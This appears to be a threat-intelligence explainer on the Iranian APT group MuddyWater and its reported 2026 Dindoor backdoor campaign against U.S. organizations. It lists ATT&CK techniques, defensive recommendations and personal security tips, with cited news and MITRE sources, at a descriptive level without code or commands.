The Iranian Hackers Already Inside U.S. Networks — And Nobody's Talking About It
MuddyWater (Seedworm)
Iran-Backed Advanced Persistent Threat Group
MuddyWater (also known as Seedworm, MERCURY, Static Kitten, Mango Sandstorm, and TA450) is a state-sponsored cyber espionage group attributed to Iran's Ministry of Intelligence and Security (MOIS). Active since at least 2017, the group targets government, defense, telecommunications, financial, and critical infrastructure organizations across the Middle East, North America, Europe, Asia, and Africa. MuddyWater operates as a subordinate element of MOIS, conducting intelligence collection and espionage campaigns aligned with Iranian national security objectives. The group has demonstrated increasing operational sophistication, rapidly adopting new tools and techniques to evade detection.
Recent Campaign: Operation Dindoor (2026)
In early 2026, research from Broadcom's Symantec and Carbon Black Threat Hunter Team identified an active MuddyWater campaign targeting multiple U.S. organizations. Confirmed victims include U.S. banks, airports, non-profit organizations, a Canadian non-profit, and the Israeli branch of a defense and aerospace software supplier. The campaign is assessed to have intensified following U.S. and Israeli military strikes on Iran in early 2026, reflecting the group's role as a tool of Iranian state retaliation.
The campaign has contributed to a broader wave of Iranian-linked cyber espionage that is raising alarms across critical sectors in the United States. Security agencies and private researchers have observed a sharp increase in activity targeting financial institutions, aviation infrastructure, energy utilities, and the defense industrial base. The Canadian Centre for Cyber Security has issued formal advisories warning that Iran will likely leverage its cyber apparatus for retaliatory attacks against Western critical infrastructure and to conduct information operations furthering the regime's interests.
MuddyWater is not operating in isolation. Fellow Iranian APT groups — including Charming Kitten, OilRig, Agrius, Elfin, and Fox Kitten — have shown clear signs of simultaneous activation and rapid retooling, positioning themselves for coordinated retaliatory operations. Analysts at LevelBlue note that cyber capabilities are among Iran's most accessible asymmetric tools for striking back at Western nations and Gulf states. Wiper campaigns targeting Israeli energy, financial, and government sectors are already underway, with Iran's known wiper arsenal comprising more than 15 malware families. UltraViolet Cyber has characterized Iran's offensive cyber posture as a "durable instrument of state power," emphasizing that Iranian operators increasingly focus on identity and cloud control planes — using credential theft, password spraying, and persistence through enterprise services — rather than relying solely on novel zero-day exploits.
Tactics, Techniques & Procedures (TTPs)
Dindoor Backdoor
The centerpiece of the 2026 campaign is a previously unknown backdoor called Dindoor, which leverages the Deno JavaScript runtime for execution — a deliberate choice to evade endpoint detection solutions that monitor more common runtimes like Node.js. Dindoor enables remote command execution, persistent access, and data exfiltration, communicating over HTTPS using cloud storage providers Backblaze and Wasabi for payload delivery and C2 traffic.
Supporting Malware & Tools
Fakeset: A Python-based backdoor delivered via Backblaze cloud storage servers, sharing digital certificates with known MuddyWater malware families Stagecomp and Darkcomp.
Rclone: Employed to exfiltrate large volumes of data to attacker-controlled Wasabi cloud storage buckets, blending malicious traffic with legitimate cloud activity.
Social Engineering: Spear-phishing campaigns and 'honeytrap' operations are used to establish initial access and steal credentials, targeting privileged users and administrators.
MITRE Adversarial Tactics, Techniques, and Common Knowledge
MuddyWater's tradecraft maps to numerous ATT&CK techniques, including: T1566 (Phishing/Spear-Phishing), T1059.007 (JavaScript Command Execution), T1071.001 (Web Protocol C2), T1041 (Exfiltration Over C2 Channel), T1027 (Obfuscated Files), T1105 (Ingress Tool Transfer), and T1548.002 (UAC Bypass). The group also employs credential theft, password spraying, and persistence through scheduled tasks and registry modifications.
Defensive Recommendations
Monitor for unexpected Deno runtime installations and executions on endpoints, particularly in non-development environments.
Audit and restrict access to cloud storage services (Backblaze, Wasabi); review firewall and proxy logs for anomalous uploads or downloads.
Deploy phishing-resistant MFA, enforce network segmentation, and conduct regular spear-phishing simulations targeting privileged accounts.
Patch all internet-facing assets promptly, with focus on vulnerabilities exploited by Iranian APTs (e.g., CVE-2017-7921, CVE-2021-36260).
Integrate threat intelligence feeds and YARA rules for Dindoor, Fakeset, Stagecomp, and Darkcomp into security monitoring platforms.
Guidance for Individuals
While MuddyWater primarily targets organizations rather than individuals, everyday employees at companies in critical sectors — finance, defense, aviation, technology, and nonprofits — can serve as entry points through spear-phishing and social engineering, which are the group's preferred methods of initial access. The following personal security habits significantly reduce that risk:
Be skeptical of unsolicited emails, messages, and connection requests — MuddyWater is known for highly convincing spear-phishing and 'honeytrap' social engineering. If someone reaches out unexpectedly with an attachment or link, verify through a separate channel before engaging.
Use strong, unique passwords and a password manager — credential theft is a core MuddyWater technique. Reusing passwords across work and personal accounts is a significant vulnerability.
Enable multi-factor authentication (MFA) on all work accounts, email, and any systems tied to your employer. Hardware-based or phishing-resistant MFA is strongly preferred over SMS-based options.
Do not install unknown software or runtimes on work devices — Dindoor relies on users executing unfamiliar payloads. If your IT department did not deploy it, do not run it.
Keep all personal and work devices patched and updated — many Iranian APT intrusions exploit known, unpatched vulnerabilities that vendors have already issued fixes for.
Sources
The Hacker News — "Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor" (March 6, 2026). https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html
Infosecurity Magazine — "Iran's MuddyWater Hackers Hit US Firms with New 'Dindoor' Backdoor". https://www.infosecurity-magazine.com/news/iran-muddywater-hackers-us-firms/
MITRE ATT&CK — MuddyWater Group Profile (G0069). https://attack.mitre.org/groups/G0069/
SC Magazine — "Iranian APT Group MuddyWater Targets Multiple US Companies". https://www.scmagazine.com/news/iranian-apt-group-muddywater-targets-multiple-us-companies
Council on Foreign Relations — Cyber Operations Tracker: MuddyWater. https://www.cfr.org/cyber-operations/muddywater
Rescana — "MuddyWater's Dindoor Backdoor: Iranian APT Targets U.S. Organizations via Deno Runtime and Cloud Storage". https://www.rescana.com/post/muddywater-s-dindoor-backdoor-iranian-apt-targets-u-s-organizations-via-deno-runtime-and-cloud-sto
